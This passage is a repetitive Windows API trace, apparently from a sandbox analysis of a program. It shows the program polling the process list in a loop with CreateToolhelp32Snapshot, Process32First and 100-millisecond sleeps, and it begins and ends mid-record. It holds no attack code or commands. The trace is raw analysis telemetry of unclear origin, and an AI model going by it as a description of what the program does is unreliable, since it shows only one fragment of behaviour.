szExeFile="[System Process]")) returned 1 [0284.819] Sleep (dwMilliseconds=0x64) [0284.822] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2320 [0284.840] Process32First (in: hSnapshot=0x2320, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0284.939] Sleep (dwMilliseconds=0x64) [0284.944] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2320 [0284.967] Process32First (in: hSnapshot=0x2320, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0285.078] Sleep (dwMilliseconds=0x64) [0285.081] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2320 [0285.098] Process32First (in: hSnapshot=0x2320, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0285.172] Sleep (dwMilliseconds=0x64) [0285.175] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2320 [0285.188] Process32First (in: hSnapshot=0x2320, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0285.281] Sleep (dwMilliseconds=0x64) [0285.285] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2320 [0285.298] Process32First (in: hSnapshot=0x2320, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0285.380] Sleep (dwMilliseconds=0x64) [0285.383] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2320 [0285.397] Process32First (in: hSnapshot=0x2320, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0285.478] Sleep (dwMilliseconds=0x64) [0285.481] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2320 [0285.501] Process32First (in: hSnapshot=0x2320, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0285.577] Sleep (dwMilliseconds=0x64) [0285.589] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2320 [0285.601] Process32First (in: hSnapshot=0x2320, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0285.688] Sleep (dwMilliseconds=0x64) [0285.692] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2320 [0285.712] Process32First (in: hSnapshot=0x2320, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0285.790] Sleep (dwMilliseconds=0x64) [0285.793] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2320 [0285.805] Process32First (in: hSnapshot=0x2320, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0285.931] Sleep (dwMilliseconds=0x64) [0285.935] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2320 [0285.955] Process32First (in: hSnapshot=0x2320, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0286.065] Sleep (dwMilliseconds=0x64) [0286.069] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2320 [0286.090] Process32First (in: hSnapshot=0x2320, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0286.186] Sleep (dwMilliseconds=0x64) [0286.190] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x141c [0286.225] Process32First (in: hSnapshot=0x141c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0286.330] Sleep (dwMilliseconds=0x64) [0286.335] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x141c [0286.351] Process32First (in: hSnapshot=0x141c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0286.446] Sleep (dwMilliseconds=0x64) [0286.450] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x141c [0286.466] Process32First (in: hSnapshot=0x141c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0286.564] Sleep (dwMilliseconds=0x64) [0286.569] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x141c [0286.587] Process32First (in: hSnapshot=0x141c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0286.672] Sleep (dwMilliseconds=0x64) [0286.718] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x141c [0286.730] Process32First (in: hSnapshot=0x141c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0286.809] Sleep (dwMilliseconds=0x64) [0286.812] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x141c [0286.824] Process32First (in: hSnapshot=0x141c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0286.891] Sleep (dwMilliseconds=0x64) [0286.893] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x141c [0286.905] Process32First (in: hSnapshot=0x141c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0286.974] Sleep (dwMilliseconds=0x64) [0286.975] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x141c [0286.987] Process32First (in: hSnapshot=0x141c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0287.063] Sleep (dwMilliseconds=0x64) [0287.064] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x141c [0287.076] Process32First (in: hSnapshot=0x141c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0287.152] Sleep (dwMilliseconds=0x64) [0287.153] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x141c [0287.165] Process32First (in: hSnapshot=0x141c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0287.253] Sleep (dwMilliseconds=0x64) [0287.254] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x141c [0287.275] Process32First (in: hSnapshot=0x141c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0287.362] Sleep (dwMilliseconds=0x64) [0287.365] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x141c [0287.381] Process32First (in: hSnapshot=0x141c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0287.471] Sleep (dwMilliseconds=0x64) [0287.474] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x141c [0287.489] Process32First (in: hSnapshot=0x141c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0287.585] Sleep (dwMilliseconds=0x64) [0287.586] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x141c [0287.604] Process32First (in: hSnapshot=0x141c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0287.697] Sleep (dwMilliseconds=0x64) [0287.699] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x141c [0287.717] Process32First (in: hSnapshot=0x141c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0287.807] Sleep (dwMilliseconds=0x64) [0287.808] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x141c [0287.826] Process32First (in: hSnapshot=0x141c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0287.915] Sleep (dwMilliseconds=0x64) [0287.917] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x141c [0287.934] Process32First (in: hSnapshot=0x141c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0288.097] Sleep (dwMilliseconds=0x64) [0288.107] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0288.125] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0288.232] Sleep (dwMilliseconds=0x64) [0288.238] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0288.256] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0288.346] Sleep (dwMilliseconds=0x64) [0288.348] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0288.387] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0288.474] Sleep (dwMilliseconds=0x64) [0288.475] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0288.489] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0288.572] Sleep (dwMilliseconds=0x64) [0288.574] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0288.595] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0288.790] Sleep (dwMilliseconds=0x64) [0288.827] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0288.839] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0288.953] Sleep (dwMilliseconds=0x64) [0288.954] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0288.967] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0289.184] Sleep (dwMilliseconds=0x64) [0289.185] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0289.226] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0289.303] Sleep (dwMilliseconds=0x64) [0289.306] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0289.320] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0289.403] Sleep (dwMilliseconds=0x64) [0289.405] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0289.416] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0289.487] Sleep (dwMilliseconds=0x64) [0289.488] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0289.505] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0289.577] Sleep (dwMilliseconds=0x64) [0289.581] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0289.596] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0289.711] Sleep (dwMilliseconds=0x64) [0289.713] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0289.732] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0289.813] Sleep (dwMilliseconds=0x64) [0289.815] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0289.827] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0289.897] Sleep (dwMilliseconds=0x64) [0289.900] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0289.915] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0289.988] Sleep (dwMilliseconds=0x64) [0289.989] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0290.007] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0290.121] Sleep (dwMilliseconds=0x64) [0290.122] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0290.139] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0290.254] Sleep (dwMilliseconds=0x64) [0290.255] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0290.274] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0290.365] Sleep (dwMilliseconds=0x64) [0290.369] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0290.392] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0290.469] Sleep (dwMilliseconds=0x64) [0290.470] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0290.482] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0290.549] Sleep (dwMilliseconds=0x64) [0290.551] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0290.563] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0290.629] Sleep (dwMilliseconds=0x64) [0290.631] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0290.643] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0290.734] Sleep (dwMilliseconds=0x64) [0290.737] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0290.751] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0290.823] Sleep (dwMilliseconds=0x64) [0290.825] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0290.839] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0290.920] Sleep (dwMilliseconds=0x64) [0290.923] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0290.939] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0291.007] Sleep (dwMilliseconds=0x64) [0291.010] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0291.022] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0291.116] Sleep (dwMilliseconds=0x64) [0291.118] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0291.135] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0291.241] Sleep (dwMilliseconds=0x64) [0291.246] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0291.260] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0291.350] Sleep (dwMilliseconds=0x64) [0291.352] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0291.373] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0291.562] Sleep (dwMilliseconds=0x64) [0291.564] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0291.582] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0291.657] Sleep (dwMilliseconds=0x64) [0291.658] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0291.685] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0291.766] Sleep (dwMilliseconds=0x64) [0291.769] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0291.786] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, 